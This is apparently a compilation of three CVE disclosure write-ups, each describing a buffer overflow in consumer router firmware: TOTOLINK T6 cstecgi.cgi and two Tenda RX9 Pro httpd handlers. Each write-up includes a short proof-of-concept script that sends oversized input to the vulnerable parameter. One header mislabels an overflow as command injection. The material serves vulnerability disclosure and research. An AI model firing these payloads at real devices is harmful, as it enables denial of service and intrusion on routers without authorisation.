TOTOLINK T6 V4.1.5cu.709_B20210518 is vulnerable to Buffer Overflow via cstecgi.cgi

Permalink

**Command Injection****TOTOLINK\_T6**

version: V4.1.5cu.709\_B20210518

**Description:**

There is a buf overflow in cstecgi.cgi

**Source:**

you may download it from : http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=16&ids=36

**Analyse:**

in sub\_421AA0, v7 get from pin,and then pass to v16 , but dont check the length.

finally ,cause overflow.

**POC**

    from pwn import *
    import json
    
    data = {
        "topicurl": "setting/setWiFiWpsStart",
        "wscMode": "1",
        "pin": b'a'*0x200 
    }
    
    data = json.dumps(data)
    print(data)
    
    argv = [
        "qemu-mipsel-static",
        "-g", "1234",
        "-L", "./root/",
        "-E", "CONTENT_LENGTH={}".format(len(data)),
        "-E", "REMOTE_ADDR=192.168.0.1",
        "./cstecgi.cgi"
    ]
    
    a = process(argv=argv)
    a.sendline(data.encode())
    
    a.interactive()

CVE-2022-38827: CVE/setWiFiWpsStart_2.md at main · whiter6666/CVE

Tenda RX9_Pro V22.03.02.10 is vulnerable to Buffer Overflow via httpd/setIPv6Status.

Permalink

**1** contributor

**Users who have contributed to this file**

**buffer overflow****Tenda\_RX9\_Pro**

version: V22.03.02.10

**Description:**

There is a buffer overflow in httpd/setIPv6Status

**Source:**

you may download it from : https://www.tendacn.com/download/detail-4218.html

**Analyse:**

get value from conType and call strcpy, cause buff overflow

**POC**

    url = "http://192.168.1.13/goform/setIPv6Status"
    payload = 'A'*300 + '\n'
    
    r = requests.post(url, data={'conType': payload})

CVE-2022-38830: CVE/setIPv6Status.md at main · whiter6666/CVE

Tenda RX9_Pro V22.03.02.10 is vulnerable to Buffer Overflow via httpd/setMacFilterCfg.

Permalink

**1** contributor

**Users who have contributed to this file**

**buffer overflow****Tenda\_RX9\_Pro**

version: V22.03.02.10

**Description:**

There is a buffer overflow in httpd/setMacFilterCfg

**Source:**

you may download it from : https://www.tendacn.com/download/detail-4218.html

**Analyse:**

get value from deviceList

then call sub\_4223E0

finally call strcpy ,dont check the length, cause buff overflow

**POC**

    url = "http://192.168.1.13/goform/setMacFilterCfg"
    payload = 'A'*300 + '\n'
    
    r = requests.post(url, data={'deviceList': payload})

Tag

#buffer_overflow